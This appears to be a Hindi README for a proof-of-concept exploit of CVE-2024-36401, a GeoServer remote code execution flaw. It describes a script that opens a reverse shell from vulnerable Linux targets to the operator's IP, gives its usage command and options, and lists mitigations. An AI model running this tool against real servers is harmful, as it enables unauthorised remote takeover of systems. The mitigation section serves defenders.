
CVE-2024-36401 के लिए POC। यह POC vlun लक्ष्यों से रिवर्स शेल स्थापित करने का प्रयास करेगा।
CVE-2024-36401 GeoServer के लिए POC। यह POC लक्ष्यों से एक रिवर्स सिस्टम शेल स्थापित करने का प्रयास करेगा।

CVE-2024-36401 के लिए POC: GeoServer के संस्करण 2.25.1, 2.24.3 और 2.23.5 से पहले के GeoServer के लिए RCE। यह POC phith0n द्वारा सुरक्षा सलाह पर आधारित है।
यह POC vlun लक्ष्यों से एक रिवर्स शेल स्थापित करने का प्रयास करेगा। यह vlun Linux लक्ष्यों के विरुद्ध काम करने के लिए लक्षित है। इस POC को चलाने के लिए आपके पास एक प्रकाशित और सुलभ IP वाली मशीन होनी चाहिए।
requests लाइब्रेरीएकल लक्ष्य के विरुद्ध इस POC का उपयोग करने के लिए:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
सहायता:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
1- WFS अनुरोधों को अक्षम करें।
2- अपने Linux को iptables कॉन्फ़िगर करके रिवर्स कनेक्शन को अक्षम करें, सभी ट्रैफ़िक को ड्रॉप करने के लिए डिफ़ॉल्ट नीतियाँ सेट करें, स्थापित और संबंधित कनेक्शनों की अनुमति दें, और केवल DNS, HTTP और HTTPS जैसे आवश्यक आउटबाउंड ट्रैफ़िक की अनुमति दें।
3- या GeoServer के नवीनतम संस्करण में अपग्रेड करें।
किसी भी सुझाव या विचार के लिए, कृपया मुझसे संपर्क करें।
मुझे केवल मनोरंजन, कार्य और शैक्षिक उद्देश्यों के लिए अपने स्वयं के उपकरण बनाना पसंद है। मैं किसी भी सिस्टम या नेटवर्क में हैकिंग या अनधिकृत पहुँच का समर्थन या प्रोत्साहन नहीं करता हूँ। कृपया मेरे उपकरणों का जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर जहाँ आपके पास स्पष्ट अनुमति है।